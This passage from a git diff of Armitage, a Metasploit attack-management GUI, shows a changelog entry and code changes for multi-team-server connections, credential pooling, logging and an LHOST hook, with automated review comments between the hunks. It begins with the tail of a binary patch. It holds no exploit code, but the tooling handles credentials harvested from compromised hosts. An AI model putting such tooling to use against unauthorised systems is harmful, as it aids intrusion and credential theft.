z&WW~rQFD`-oY=w$+u1U)D%_To&yiO_|G*Cm@rW<8yXQY}SkZh=tjr8o(!qbA{MABQ zy$@{reNb+-gcAeyL0=s9qV|cMg&gcVF^Txi2#9V!%KW~PY4M@o_QUuScwTomZUxWo z#~q#B2HKW`g-E{~wDqD)49`KQloEYO4h*`tiOF;j;<vGH|J0-5&Q$vV)LQT0g=ZXq z8=CCm#O(vP56;-bi8^QCliCL%J7AwIdk~fmJj{vwgDBYjBqzS+A)};6xTKtDa|l&$ zIm>x-4?*dI^PCVL!e1{BLFpsBH;Gwa<1hkgeO;D4j0AadlM{~*!%KZ`bE3|_sIJN# 
zPAvJCty0}%gfHd154U266g8wif)S`fNjQZZ5nC#<ai%cRCjt+TAHgWp##W--=&4@> zj!EFX5WItxD;r@vUTnuB?MHEVGU_ONI@W;^U4=<_hW#k+qdy)+`=>i|LLVGqOVzKS z+7bVuwPtR-VD^95N>Y^Jgu^k!>=s5CrgDNV!iGntfoM|aMeI}^#di9^V_1o^35=kW zDiHy4QXPlt4M7xr9Jhb{%CT>6+ISqUcwU|pC5#9U<HWJr5!e}KH_}oVhMhp^AzIGM zIstF?uOOE?ftZw5;zaC8IQ?B!PRwr>p{9^0XjZ3|5gJUS`6n~^G2LaAf5O2RMNHiY z%559rOHEF}wbSZHP;}=AFIt#@n?R}NtW$_Y!(U|lUWW)bwxX#a>(jswG?efFR$4<J zdz(1pcWhgo#(iGn*6iDl9``|$JZpXnmv9D6s)_9@#;bh>?%mvh6U_&~@b7JZG}uJ# z$WBZOFB&_8j<dN74Lb{mN1a8Gf9=YM4nmpk?AwnD&O+j8AM!efTjJCGXz)4gjXfAd z`_3T*i-(drS8S#j@>>MGNQo#%6LaB!(_<rO!2-Br(A)?YwxuBZzc3fA)l8I_L8Lp6 ztgkkeww=ck-8q6Jdj}u)SJNyLYp>zy-t*Xr{Ueo1&x_53w;9y@0+wNiWzp*kIA^>0 z0`AB0#5{=ZLR>brx`-^@vV+l{wD$&XuJbRV>e77?l$0A$mV7Uv>Jf*j=_Ryf@?~0n zNo=7wofknZUPqLns)bmA8uT{8!RU<Er~C*?E`p8oFJpJH$z=q+(*5sHRfXAOiSlLd zN5j(IWmK2?RDy82r-XM6c&1Q>CSJix*7a8rwAxzhO6RVK6&3#PB+8HXiAq<Y!M-Sh zT3r=eDP|N)|G;^ft2jPwUn1A6zJ@bUx6QQNw2s%HCDcNua@@5l+H?)!7-20#h1XDc zf~`#L571gu^mS~lhuD9I?2MADe3;gFS#5`#EOxf0){0`nw7zuk1{&*j1E%)${()&l zL*B#j0~qsN+3!pnT605eq^KV99daPeP1u<qE<>$uVkPdnPNrVn#H#!Hn_{GS8bz{L z0;sDf!sd$<5Ku~ry@h~muPj52n`mvxgY~cNw@~|#sxtoI7TjfDQ>G&GK>63!(&|{P z4;QCA^rn<L)GD9NJlbd-Y5Z+yDPZs>JXz0R&)ZmivBv}Sj2L<wLq&KaMtIPX&RPvG zaIL%6co6N|j0==@*E&$#18A(A4~=tLGPt$yZ!6Bu$;Tixq%|k(?qD2y*_IJ*)cFnu z(bjmro)KH_pw7h3jKF^UJ<*OPC1`DENh2)OCmq8Yf7o5D@#o>$dt(7Nz6l_WMsx0> z_Stbp0=f}e7d9ecx2=}}ZZ0hCXCUlo{ylWE`vVP#Exo^op<&{1j?}u3!N+nWCuZNr zj>myfoVa}-<5%y|2Ev6}wnGBJ5jY<*fx{UOP~hVv%6lNTQEX4rQl-UOf9d%ZJ|OgZ zh(I2kqNTcov`c@8bm{)PmhzWsL#5@r)JItOE15z5kI<v9&ZNXgVq0Nf3j21!dq=c( zMpxsHkDx1KmX-omp$>lOdyL|JW>frQj4l=C(B{V&ZHlFDZ(6z<iGYhHE&+d-bcn}u zwbcI)gAO+7pRvXy@@_bB^F(YU{IZ;$KEdy9yxOj%VaK$7e0yICM*ji?qy8?MT7W9w z?4t_>xK`gjhL%1+OsYObVjs+vD1S<MigxQSN)!$kKScu1yCO?^J%j)2-=y}>aI`P# zj+PF*MOx!Di#(*Bc!pN*zpJIF_u8`j>Qm-9pjVGzQjr!<3p{6IMS(;))7<AcJvjWi zOkI19s%jN!$+1w3RoIniX|5xFbyeC|ihYEfTU;o5D3Z+agtDtn*51}#XWR+yDJcI1 z(%0n$l4hz6C%V2smY-H}BI^b6|G1hFO@+s{Wd2%oOMNA(srgG}d^h{=KuLfOr-EK0 
zfBts(hSn4g`?7!g;{2$t3?D=XRx&Z+lRp>O{|cGxf=9exBUw&GQmfZuC&8)``}U^e zuVG)WdXiewyn$06Hl${6#HNbUPC7~&qVp%u7s!R<Z{WNG-E|Z_9FR1_bbX6ZruC%A zw;14R^~Nh6f75x>=&O)k$5@X2DER|U`^+1!v!t7EaW_!h-+-v8`a3izXAnn5zk@S= zAIgbCjHo}16RP*HzS9U!JfEg>qE2iSp7I_w;5C#|4e=>DJ38<l`hFY3k&^fD^x|Yj zxKNW1n7B>DKGz3%adG1Z+~k%_)zPG-XbgMfn6#)8r0X@%3F{8|Sm-r<#N@#5X!tUu z0DC8bboXCN8`0<-<aT2T%JjXlb}7{3BXWx^<<0$w1rWD|wDF^S=Dp*(^pxvZ32lzs zb<-zfCZ*ELkMff-exG39lBK%T4LT3fZ_-&)w@>n7&S1tGxSX>Bd&wvF_b{~LN{-^k zft{uHwBM?!R~f4ZRq()?=`(8&)0k)(nz&8J-z6bg+v+p4wA-Yk$WuBO>3vDk%aYkI z2~+xKJiAt5tIRv~S+3&8U-<n#VO+mmmaTmZ_On-WNXpo+hmx)c$~ONk33y5G=aB6E z@z)%`D~sPND_c_}S8VcAfZqi1otZp%pN?LigX3PIPN`j`MTmlUn!LY=p;ARvKbSx3 zhbXXzgiKfTOV8+N*<GYDdqJ>Nc)=GGUUiPPd=Z1C2hG2nSy<l(SyBV*dZw!_%Ii9_ zUkB*xwq?IUxgbGw4QDGrdiv|Xt_b(9SW7dNZ=3gBz7HK-qIW6J3Runl<>eq)mV!!5 z3*_J71<0;Q^pKRh^;yyS7L+F;6-{Nw+&5M}?4jO8%G<;19m98`z~`R|OnpqRi{-VV zqLVGMtH1=d4r{8m|1%Q5ihhzC!&X+Y`hZq-MUJ5x7(SWFX9{(c_*Guwoc9%J^$I`Q zu=%U}m~*vZF>~0HAM;R!=>p&W4?21UF+Fp{sR|+PX%L(Lli0jZa^w1p9@%g}pTWIp zwT0*+8FjC6q}4hU+WJ$WIJ{9}REfOezoG<2RWH`jo^Qx)h7^_PsJKLahQzNFq0bel zR;k>QE&vqn7I+W1yWW-Nmdg2+#^fBWXm9DaO%Mj0RZ?*&*R;eh(o2z~)>A+L-l-(| z;RRCP3NIM|)^t0G<@5cu)ccZMGS8wF-Uxu{@G{R~Np7Sxx-9vMqU5Nj$Z~kMCVR_` z<bbr)_pcYC@n4WWrbV|q%NC3?kK~V4Eii|QNp2GCO1dy?s<9{Bq{P1tp773t<_eKz z$X<x#`J+7Z<jD*ebq;Yi9V2ZqIx^Ay74VuUL-!dbKuc~}#^OWbKMWXCo~{Xz@~ie0 z0EPsURuRb`yT7pM-DUP{**P>K(2!KDYu^c_1Vv<|l*p?ZYz=FJF6fWsGhIqP7ETAD zD}<%c=gaS`lAt3Mf2NDH%`53yXKmJJ49(Bgdq}QZd+kQue<7(u?UnKU?UR}OwUVAT zH^F<0vKzzK?1~}zXr=}H=UheN`AIKGlx%Czw0`CB&`}?bGJQVJsTRdrMe@ga$62A_ z|JBB;!Xo*@I`I+rhp`v5u%Mg1dt_D=-LZ<~uUN6MMxC3Z^%OlA_C#CD;fet)Os!9Y Xtt0*IFIil&Xg=TEEVv2w2h9ElMPvG^ diff --git a/data/armitage/whatsnew.txt b/data/armitage/whatsnew.txt index c1e03e579b70..55804871ffbd 100755 --- a/data/armitage/whatsnew.txt +++ b/data/armitage/whatsnew.txt 
@@ -1,6 +1,29 @@ Armitage Changelog ================== +12 Feb 13 (tested against msf 16438) +--------- +- Fixed a corner case preventing the display of removed host labels + when connected to a team server. +- Fixed RPC call cache corruption in team server mode. This bug could + lead to some exploits defaulting to a shell payload when meterpreter + was a possibility. +- Slight optimization to some DB queries. I no longer pull unused + fields making the query marginally faster. Team server is more + efficient too as changes to unused fields won't force data (re)sync. +- Hosts -> Clear Database now clears host labels too. +- Added the ability to manage multiple team server instances through + Armitage. Go to Armitage -> New Connection to connect to another + server. A button bar will appear that allows you to switch active + Armitage connections. + - Credentials available across instances are pooled when using + the [host] -> Login menu and the credential helper. +- Rewrote the event log management code in the team server +- Added nickname tab completion to event log. I feel like I'm writing + an IRC client again. +- Hosts -> Clear Database now asks you to confirm the action. +- Hosts -> Import Hosts announces successful import to event log again. + 23 Jan 13 (tested against msf 16351) --------- - Added helpers to set EXE::Custom and EXE::Template options. diff --git a/external/source/armitage/resources/about.html b/external/source/armitage/resources/about.html index e19056effad4..1167b175f417 100644 --- a/external/source/armitage/resources/about.html +++ b/external/source/armitage/resources/about.html @@ -3,7 +3,7 @@ <center><h1>Armitage 1.45</h1></center> <p>An attack management tool for Metasploit® - <br />Release: 23 Jan 13</p> + <br />Release: 12 Feb 13</p> <br /> <p>Developed by:</p> diff --git a/external/source/armitage/scripts-cortana/internal.sl b/external/source/armitage/scripts-cortana/internal.sl index c83929a79c1c..5ab90d72355b 100644 
--- a/external/source/armitage/scripts-cortana/internal.sl +++ b/external/source/armitage/scripts-cortana/internal.sl @@ -9,6 +9,9 @@ import msf.*; # setg("varname", "value") sub setg { + if ($1 eq "LHOST") { + call_async("armitage.set_ip", $2); + } cmd_safe("setg $1 $2"); } diff --git a/external/source/armitage/scripts/armitage.sl b/external/source/armitage/scripts/armitage.sl index fe2af9a9ecbc..427e1c4a82a3 100644 --- a/external/source/armitage/scripts/armitage.sl +++ b/external/source/armitage/scripts/armitage.sl @@ -15,7 +15,7 @@ import graph.*; import java.awt.image.*; -global('$frame $tabs $menubar $msfrpc_handle $REMOTE $cortana $MY_ADDRESS'); +global('$frame $tabs $menubar $msfrpc_handle $REMOTE $cortana $MY_ADDRESS $DESCRIBE @CLOSEME'); sub describeHost { local('$desc'); @@ -165,6 +165,7 @@ sub _connectToMetasploit { $aclient = [new RpcAsync: $client]; $mclient = $client; initConsolePool(); + $DESCRIBE = "localhost"; } # we have a team server... connect and authenticate to it. else { @@ -172,6 +173,11 @@ sub _connectToMetasploit { setField(^msf.MeterpreterSession, DEFAULT_WAIT => 20000L); $mclient = setup_collaboration($3, $4, $1, $2); $aclient = $mclient; + + if ($mclient is $null) { + [$progress close]; + return; + } } $flag = $null; } 
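Review bot: The new `LHOST` check in `setg` uses `eq`, which is a case-sensitive string comparison, so a call such as `setg("lhost", ...)` still reaches `cmd_safe` but skips `armitage.set_ip`. If the console treats option names case-insensitively (worth confirming), the address Armitage tracks and the real LHOST value can drift apart. Normalizing first would avoid that: `if (uc($1) eq "LHOST") {`. The comment above the function could also mention the side effect, e.g. `# setg("varname", "value") - setting LHOST also updates the address via armitage.set_ip`.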
@@ -319,28 +325,23 @@ sub postSetup { } sub main { - local('$console $panel $dir'); + local('$console $panel $dir $app'); - $frame = [new ArmitageApplication]; + $frame = [new ArmitageApplication: $__frame__, $DESCRIBE, $mclient]; [$frame setTitle: $TITLE]; - [$frame setSize: 800, 600]; - + [$frame setIconImage: [ImageIO read: resource("resources/armitage-icon.gif")]]; init_menus($frame); initLogSystem(); - [$frame setIconImage: [ImageIO read: resource("resources/armitage-icon.gif")]]; - [$frame show]; - [$frame setExtendedState: [JFrame MAXIMIZED_BOTH]]; - # this window listener is dead-lock waiting to happen. That's why we're adding it in a # separate thread (Sleep threads don't share data/locks). fork({ - [$frame addWindowListener: { + [$__frame__ addWindowListener: { if ($0 eq "windowClosing" && $msfrpc_handle !is $null) { closef($msfrpc_handle); } }]; - }, \$msfrpc_handle, \$frame); + }, \$msfrpc_handle, \$__frame__); dispatchEvent({ if ($client !is $mclient) { @@ -371,7 +372,6 @@ sub checkDir { } } -setLookAndFeel(); checkDir(); if ($CLIENT_CONFIG !is $null && -exists $CLIENT_CONFIG) { diff --git a/external/source/armitage/scripts/collaborate.sl b/external/source/armitage/scripts/collaborate.sl index 4a2cc2959c0f..2f302c3837e8 100644 --- a/external/source/armitage/scripts/collaborate.sl +++ b/external/source/armitage/scripts/collaborate.sl @@ -23,6 +23,7 @@ sub createEventLogTab { $client = [$cortana getEventLog: $console]; [$client setEcho: $null]; [$console updatePrompt: "> "]; + [new EventLogTabCompletion: $console, $mclient]; } else { [$console updateProperties: $preferences]; @@ -63,6 +64,7 @@ sub c_client { # run this thing in its own thread to avoid really stupid deadlock situations local('$handle'); $handle = [[new SecureSocket: $1, int($2), &verify_server] client]; + push(@CLOSEME, $handle); return wait(fork({ local('$client'); $client = newInstance(^RpcConnection, lambda({ 
@@ -91,9 +93,11 @@ sub setup_collaboration { %r = call($mclient, "armitage.validate", $1, $2, $nick, "armitage", 120326); if (%r["error"] eq "1") { showErrorAndQuit(%r["message"]); + return $null; } %r = call($client, "armitage.validate", $1, $2, $null, "armitage", 120326); + $DESCRIBE = "$nick $+ @ $+ $3"; return $mclient; } diff --git a/external/source/armitage/scripts/gui.sl b/external/source/armitage/scripts/gui.sl index 7f7f155f8828..d5dae2412b98 100644 --- a/external/source/armitage/scripts/gui.sl +++ b/external/source/armitage/scripts/gui.sl @@ -95,13 +95,13 @@ sub dispatchEvent { sub showError { dispatchEvent(lambda({ - [JOptionPane showMessageDialog: $frame, $message]; + [JOptionPane showMessageDialog: $__frame__, $message]; }, $message => $1)); } sub showErrorAndQuit { - [JOptionPane showMessageDialog: $frame, $1]; - [System exit: 0]; + [JOptionPane showMessageDialog: $__frame__, $1]; + [$__frame__ closeConnect]; } sub ask { @@ -155,7 +155,7 @@ sub chooseFile { [$fc setFileSelectionMode: [JFileChooser DIRECTORIES_ONLY]]; } - [$fc showOpenDialog: $frame]; + [$fc showOpenDialog: $__frame__]; if ($multi) { return [$fc getSelectedFiles]; @@ -179,17 +179,18 @@ sub saveFile2 { [$fc setSelectedFile: [new java.io.File: $sel]]; } - [$fc showSaveDialog: $frame]; - $file = [$fc getSelectedFile]; - if ($file !is $null) { - return $file; + if ([$fc showSaveDialog: $__frame__] == 0) { + $file = [$fc getSelectedFile]; + if ($file !is $null) { + return $file; + } } } sub saveFile { local('$fc $file'); $fc = [new JFileChooser]; - [$fc showSaveDialog: $frame]; + [$fc showSaveDialog: $__frame__]; $file = [$fc getSelectedFile]; if ($file !is $null) { local('$ihandle $data $ohandle'); 
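Review bot: The result of the second `armitage.validate` call (the one on `$client`) is stored in `%r` but never inspected before the new `$DESCRIBE` assignment and `return $mclient`. Only the first call gets the error check and the new `return $null`, so a rejected second handshake is still reported to the caller as a usable connection. Repeating the check after the second call would close that gap: `if (%r["error"] eq "1") { showErrorAndQuit(%r["message"]); return $null; }`. `setup_collaboration` starts outside this hunk, so anything done before these lines is not visible here.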
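Review bot: `showErrorAndQuit` no longer terminates the process: `[System exit: 0]` became `[$__frame__ closeConnect]`, so control now returns to the caller after the dialog is dismissed. This commit adds a `return $null` after one call in collaborate.sl, but any other call site that relied on the old never-returns behaviour will now fall through and keep running with a failed connection. A comment on the function would make the new contract explicit, for example `# closes this connection only; does not exit - callers must return after calling this`, and the remaining call sites should be checked for a following `return`.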
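Review bot: `saveFile2` now tests the dialog result against a bare `0`, while `saveFile` in the same hunk still ignores the return value of `showSaveDialog` and goes straight to `getSelectedFile`. A cancelled dialog can therefore still lead `saveFile` to write to whatever file was highlighted. Using the named constant in both places reads better and keeps them consistent: `if ([$fc showSaveDialog: $__frame__] == [JFileChooser APPROVE_OPTION]) {` in `saveFile2`, and the same guard around the `getSelectedFile` call in `saveFile`. The body of `saveFile` continues past the end of this hunk.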
@@ -250,10 +251,10 @@ sub left { sub dialog { local('$dialog $4'); - $dialog = [new JDialog: $frame, $1]; + $dialog = [new JDialog: $__frame__, $1]; [$dialog setSize: $2, $3]; [$dialog setLayout: [new BorderLayout]]; - [$dialog setLocationRelativeTo: $frame]; + [$dialog setLocationRelativeTo: $__frame__]; return $dialog; } @@ -261,7 +262,15 @@ sub window { local('$dialog $4'); $dialog = [new JFrame: $1]; [$dialog setIconImage: [ImageIO read: resource("resources/armitage-icon.gif")]]; - [$dialog setDefaultCloseOperation: [JFrame EXIT_ON_CLOSE]]; + + fork({ + [$dialog addWindowListener: { + if ($0 eq "windowClosing") { + [$__frame__ closeConnect]; + } + }]; + }, \$__frame__, \$dialog); + [$dialog setSize: $2, $3]; [$dialog setLayout: [new BorderLayout]]; return $dialog; @@ -277,12 +286,14 @@ sub overlay_images { return %cache[join(';', $1)]; } - local('$file $image $buffered $graphics'); + local('$file $image $buffered $graphics $resource'); $buffered = [new BufferedImage: 1000, 776, [BufferedImage TYPE_INT_ARGB]]; $graphics = [$buffered createGraphics]; foreach $file ($1) { - $image = [ImageIO read: resource($file)]; + $resource = resource($file); + $image = [ImageIO read: $resource]; + closef($resource); [$graphics drawImage: $image, 0, 0, 1000, 776, $null]; } @@ -371,15 +382,6 @@ sub wrapComponent { return $panel; } -sub setLookAndFeel { - local('$laf'); - foreach $laf ([UIManager getInstalledLookAndFeels]) { - if ([$laf getName] eq [$preferences getProperty: "application.skin.skin", "Nimbus"]) { - [UIManager setLookAndFeel: [$laf getClassName]]; - } - } -} - sub thread { local('$thread'); $thread = [new ArmitageThread: $1]; @@ -467,6 +469,13 @@ sub quickListDialog { [$dialog setVisible: 1]; } +sub setTableColumnWidths { + local('$col $width $temp'); + foreach $col => $width ($2) { + [[$1 getColumn: $col] setPreferredWidth: $width]; + } +} + sub tableRenderer { return [ATable getDefaultTableRenderer: $1, $2]; } 
diff --git a/external/source/armitage/scripts/hosts.sl b/external/source/armitage/scripts/hosts.sl index 448bdb8fc7f6..767415458575 100644 --- a/external/source/armitage/scripts/hosts.sl +++ b/external/source/armitage/scripts/hosts.sl @@ -8,10 +8,10 @@ import java.awt.event.*; sub addHostDialog { local('$dialog $label $text $finish $button'); - $dialog = [new JDialog: $frame, "Add Hosts", 0]; + $dialog = [new JDialog: $__frame__, "Add Hosts", 0]; [$dialog setSize: 320, 240]; [$dialog setLayout: [new BorderLayout]]; - [$dialog setLocationRelativeTo: $frame]; + [$dialog setLocationRelativeTo: $__frame__]; $label = [new JLabel: "Enter one host/line:"]; $text = [new JTextArea]; diff --git a/external/source/armitage/scripts/log.sl b/external/source/armitage/scripts/log.sl index 6916a2d78f9b..e1d6c0980065 100644 --- a/external/source/armitage/scripts/log.sl +++ b/external/source/armitage/scripts/log.sl @@ -15,8 +15,8 @@ sub logNow { if ([$preferences getProperty: "armitage.log_everything.boolean", "true"] eq "true") { local('$today $stream'); $today = formatDate("yyMMdd"); - mkdir(getFileProper(dataDirectory(), $today, $2)); - $stream = %logs[ getFileProper(dataDirectory(), $today, $2, "$1 $+ .log") ]; + mkdir(getFileProper(dataDirectory(), $today, $DESCRIBE, $2)); + $stream = %logs[ getFileProper(dataDirectory(), $today, $DESCRIBE, $2, "$1 $+ .log") ]; [$stream println: $3]; } } @@ -26,8 +26,8 @@ sub logCheck { local('$today'); $today = formatDate("yyMMdd"); if ($2 ne "") { - mkdir(getFileProper(dataDirectory(), $today, $2)); - [$1 writeToLog: %logs[ getFileProper(dataDirectory(), $today, $2, "$3 $+ .log") ]]; + mkdir(getFileProper(dataDirectory(), $today, $DESCRIBE, $2)); + [$1 writeToLog: %logs[ getFileProper(dataDirectory(), $today, $DESCRIBE, $2, "$3 $+ .log") ]]; } } } 
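Review bot: `$DESCRIBE` is now passed to `getFileProper` and `mkdir` as a directory component in `logNow` and `logCheck`, but nothing in this commit restricts what characters it can hold. For a team server connection it is built in collaborate.sl from `$nick` and the server host, so a nickname containing `/`, `\` or other characters that are not valid in a file name could place logs outside the dated directory or make `mkdir` fail silently; whether the nickname is validated elsewhere is not visible here. Normalizing the value once where it is assigned would cover every use, e.g. `$DESCRIBE = replace("$nick $+ @ $+ $3", '[^A-Za-z0-9._@-]', '_');`. The same applies to the `logFile` hunk further down in log.sl and to the artifacts path in reporting.sl.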
@@ -38,7 +38,7 @@ sub logFile { local('$today $handle $data $out'); $today = formatDate("yyMMdd"); if (-exists $1 && -canread $1) { - mkdir(getFileProper(dataDirectory(), $today, $2, $3)); + mkdir(getFileProper(dataDirectory(), $today, $DESCRIBE, $2, $3)); # read in the file $handle = openf($1); @@ -46,7 +46,7 @@ sub logFile { closef($handle); # write it out. - $out = getFileProper(dataDirectory(), $today, $2, $3, getFileName($1)); + $out = getFileProper(dataDirectory(), $today, $DESCRIBE, $2, $3, getFileName($1)); $handle = openf("> $+ $out"); writeb($handle, $data); closef($handle); @@ -70,7 +70,7 @@ sub initLogSystem { logFile([$file getAbsolutePath], "screenshots", "."); deleteFile([$file getAbsolutePath]); - showError("Saved " . getFileName($file) . "\nGo to View -> Reporting -> Activity Logs\n\nThe file is in:\n[today's date]/screenshots"); + showError("Saved " . getFileName($file) . "\nGo to View -> Reporting -> Activity Logs\n\nThe file is in:\n[today's date]/ $+ $DESCRIBE $+ /screenshots"); }, \$image, \$title)); }]; } diff --git a/external/source/armitage/scripts/menus.sl b/external/source/armitage/scripts/menus.sl index 59cd3c514382..011e0d72ed77 100644 --- a/external/source/armitage/scripts/menus.sl +++ b/external/source/armitage/scripts/menus.sl @@ -119,10 +119,13 @@ sub view_items { sub armitage_items { local('$m'); - item($1, 'Preferences', 'P', &createPreferencesTab); - + item($1, 'New Connection', 'N', { + [new armitage.ArmitageMain: cast(@ARGV, ^String), $__frame__, $null]; + }); separator($1); + item($1, 'Preferences', 'P', &createPreferencesTab); + dynmenu($1, 'Set Target View', 'S', { local('$t1 $t2'); if ([$preferences getProperty: "armitage.string.target_view", "graph"] eq "graph") { @@ -183,12 +186,13 @@ sub armitage_items { separator($1); - item($1, 'Exit', 'x', { + item($1, 'Close', 'C', { if ($msfrpc_handle !is $null) { closef($msfrpc_handle); } - [System exit: 0]; + map({ closef($1); }, @CLOSEME); + [$__frame__ quit]; }); } 
@@ -246,7 +250,7 @@ sub help_items { [$dialog add: $label, [BorderLayout CENTER]]; [$dialog pack]; - [$dialog setLocationRelativeTo: $null]; + [$dialog setLocationRelativeTo: $__frame__]; [$dialog setVisible: 1]; }); } diff --git a/external/source/armitage/scripts/passhash.sl b/external/source/armitage/scripts/passhash.sl index ad9f68ce6ac7..c5eaf94ffbd3 100644 --- a/external/source/armitage/scripts/passhash.sl +++ b/external/source/armitage/scripts/passhash.sl @@ -58,12 +58,38 @@ import ui.*; sub refreshCredsTable { thread(lambda({ [Thread yield]; - local('$creds $cred'); + local('$creds $cred $desc $aclient %check $key'); [$model clear: 128]; - $creds = call($mclient, "db.creds2", [new HashMap])["creds2"]; + foreach $desc => $aclient (convertAll([$__frame__ getClients])) { + $creds = call($aclient, "db.creds2", [new HashMap])["creds2"]; + foreach $cred ($creds) { + $key = join("~~", values($cred, @("user", "pass", "host"))); + if ($key in %check) { + + } + else if ($title ne "login" || $cred['ptype'] ne "smb_hash") { + [$model addEntry: $cred]; + %check[$key] = 1; + } + } + } + [$model fireListeners]; + }, $model => $1, $title => $2)); +} + +sub refreshCredsTableLocal { + thread(lambda({ + [Thread yield]; + local('$creds $cred $desc $aclient %check $key'); + [$model clear: 128]; + $creds = call($client, "db.creds2", [new HashMap])["creds2"]; foreach $cred ($creds) { - if ($title ne "login" || $cred['ptype'] ne "smb_hash") { + $key = join("~~", values($cred, @("user", "pass", "host"))); + if ($key in %check) { + } + else if ($title ne "login" || $cred['ptype'] ne "smb_hash") { [$model addEntry: $cred]; + %check[$key] = 1; } } [$model fireListeners]; @@ -71,7 +97,7 @@ sub refreshCredsTable { } sub show_hashes { - local('$dialog $model $table $sorter $o $user $pass $button $reverse $domain $scroll'); + local('$dialog $model $table $sorter $o $user $pass $button $reverse $domain $scroll $3'); $dialog = dialog($1, 480, $2); 
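Review bot: The de-duplication in `refreshCredsTable` is written as an empty `if ($key in %check) { }` branch followed by `else if`, and the whole loop body is then copied into `refreshCredsTableLocal`. Folding the seen-key test into the condition that adds the entry would remove the empty branch, and a small shared helper taking the model, title, `%check` and credential list would keep the two functions from drifting apart. `refreshCredsTableLocal` also declares `$desc` and `$aclient` but never uses them; its declaration can be `local('$creds $cred %check $key');`. A short comment that the key is user, pass and host joined with `~~` would help the next reader see that entries differing only in other fields are treated as duplicates.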
@@ -83,7 +109,12 @@ sub show_hashes { [$sorter setComparator: 2, &compareHosts]; [$table setRowSorter: $sorter]; - refreshCredsTable($model, $1); + if ($3) { + refreshCredsTableLocal($model, $1); + } + else { + refreshCredsTable($model, $1); + } $scroll = [new JScrollPane: $table]; [$scroll setPreferredSize: [new Dimension: 480, 130]]; @@ -94,7 +125,7 @@ sub show_hashes { sub createCredentialsTab { local('$dialog $table $model $panel $export $crack $refresh'); - ($dialog, $table, $model) = show_hashes("", 320); + ($dialog, $table, $model) = show_hashes("", 320, 1); [$dialog removeAll]; addMouseListener($table, lambda({ @@ -131,7 +162,7 @@ sub createCredentialsTab { $refresh = [new JButton: "Refresh"]; [$refresh addActionListener: lambda({ - refreshCredsTable($model, $null); + refreshCredsTableLocal($model, $null); }, \$model)]; $crack = [new JButton: "Crack Passwords"]; diff --git a/external/source/armitage/scripts/pivots.sl b/external/source/armitage/scripts/pivots.sl index 3a5e117f4aec..3adbfe450b45 100644 --- a/external/source/armitage/scripts/pivots.sl +++ b/external/source/armitage/scripts/pivots.sl @@ -107,10 +107,10 @@ sub pivot_dialog { } local('$dialog $model $table $sorter $center $a $route $button'); - $dialog = [new JDialog: $frame, $title, 0]; + $dialog = [new JDialog: $__frame__, $title, 0]; [$dialog setSize: 320, 240]; [$dialog setLayout: [new BorderLayout]]; - [$dialog setLocationRelativeTo: $frame]; + [$dialog setLocationRelativeTo: $__frame__]; [$dialog setLayout: [new BorderLayout]]; diff --git a/external/source/armitage/scripts/reporting.sl b/external/source/armitage/scripts/reporting.sl index a6a7ac5dfb08..1995e0686ef7 100644 --- a/external/source/armitage/scripts/reporting.sl +++ b/external/source/armitage/scripts/reporting.sl 
@@ -182,28 +182,21 @@ sub queryData { [$progress setProgress: 30]; } - # 4. clients - %r['clients'] = call($mclient, "db.clients")["clients"]; - - if ($progress) { - [$progress setProgress: 35]; - } - - # 5. sessions... + # 4. sessions... %r['sessions'] = fixSessions(call($mclient, "db.sessions")["sessions"]); if ($progress) { [$progress setProgress: 36]; } - # 6. timeline + # 5. timeline %r['timeline'] = fixTimeline(call($mclient, "db.events")['events']); if ($progress) { [$progress setProgress: 38]; } - # 7. hosts and services + # 6. hosts and services local('@hosts @services $temp $h $s $x'); call($mclient, "armitage.prep_export", $1); @@ -291,32 +284,27 @@ sub _generateArtifacts { [$progress setProgress: 65]; - # 4. clients - dumpData("clients", @("host", "created_at", "updated_at", "ua_name", "ua_ver", "ua_string"), %data['clients']); - - [$progress setProgress: 70]; - - # 5. hosts + # 4. hosts dumpData("hosts", @("address", "mac", "state", "address", "address6", "name", "purpose", "info", "os_name", "os_flavor", "os_sp", "os_lang", "os_match", "created_at", "updated_at"), %data['hosts']); [$progress setProgress: 80]; - # 6. services + # 5. services dumpData("services", @("host", "port", "state", "proto", "name", "created_at", "updated_at", "info"), %data['services']); [$progress setProgress: 90]; - # 7. sessions + # 6. sessions dumpData("sessions", @("host", "local_id", "stype", "platform", "via_payload", "via_exploit", "opened_at", "last_seen", "closed_at", "close_reason"), %data['sessions']); [$progress setProgress: 93]; - # 8. timeline + # 7. timeline dumpData("timeline", @("source", "username", "created_at", "info"), %data['timeline']); [$progress setProgress: 96]; - # 9. take a pretty screenshot of the graph view... + # 8. take a pretty screenshot of the graph view... [$progress setNote: "host picture :)"]; makeScreenshot("hosts.png"); 
@@ -330,7 +318,7 @@ sub _generateArtifacts { fire_event_async("user_export", %data); - return getFileProper(dataDirectory(), formatDate("yyMMdd"), "artifacts"); + return getFileProper(dataDirectory(), formatDate("yyMMdd"), $DESCRIBE, "artifacts"); } # @@ -368,8 +356,6 @@ sub api_export_data { } sub initReporting { - global('$poll_lock @events'); # set in the dserver, not in stand-alone Armitage - wait(fork({ global('$db'); [$client addHook: "armitage.export_data", &api_export_data]; diff --git a/external/source/armitage/scripts/server.sl b/external/source/armitage/scripts/server.sl index 1ea04e9671e6..4dcf4cd84d1d 100644 --- a/external/source/armitage/scripts/server.sl +++ b/external/source/armitage/scripts/server.sl @@ -35,9 +35,7 @@ sub result { sub event { local('$result'); $result = formatDate("HH:mm:ss") . " $1"; - acquire($poll_lock); - push(@events, $result); - release($poll_lock); + [$events put: $result]; } sub client { @@ -96,16 +94,6 @@ sub client { [[$handle getOutputStream] flush]; } - # limit our replay of the event log to 100 events... - acquire($poll_lock); - if (size(@events) > 100) { - $index = size(@events) - 100; - } - else { - $index = 0; - } - release($poll_lock); - # # on our merry way processing it... # 
@@ -183,33 +171,30 @@ sub client { else if ($method eq "armitage.log") { ($data, $address) = $args; event("* $eid $data $+ \n"); + if ($address is $null) { + $address = [$client getLocalAddress]; + } call_async($client, "db.log_event", "$address $+ // $+ $eid", $data); writeObject($handle, result(%())); } else if ($method eq "armitage.skip") { - acquire($poll_lock); - $index = size(@events); - release($poll_lock); + [$events get: $eid]; writeObject($handle, result(%())); } else if ($method eq "armitage.poll" || $method eq "armitage.push") { - acquire($poll_lock); if ($method eq "armitage.push") { ($null, $data) = $args; foreach $temp (split("\n", $data)) { - push(@events, formatDate("HH:mm:ss") . " < $+ $[10]eid $+ > " . $data); + [$events put: formatDate("HH:mm:ss") . " < $+ $[10]eid $+ > " . $data]; } } - if (size(@events) > $index) { - $rv = result(%(data => join("", sublist(@events, $index)), encoding => "base64", prompt => "$eid $+ > ")); - $index = size(@events); - } - else { - $rv = result(%(data => "", prompt => "$eid $+ > ", 